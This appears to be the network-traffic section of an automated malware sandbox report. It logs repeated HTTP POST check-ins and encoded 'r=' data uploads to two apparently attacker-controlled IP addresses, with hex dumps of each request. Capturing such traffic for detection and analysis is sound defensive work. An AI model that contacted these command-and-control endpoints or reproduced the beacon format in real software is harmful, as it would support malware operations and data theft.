Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
